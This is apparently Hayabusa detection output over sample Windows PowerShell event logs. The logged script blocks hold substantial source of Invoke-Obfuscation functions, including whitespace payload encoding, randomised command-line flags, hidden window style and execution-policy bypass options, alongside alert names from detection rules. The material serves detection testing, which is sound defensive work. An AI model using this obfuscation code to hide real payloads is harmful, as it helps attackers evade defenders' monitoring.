$CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.280 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious 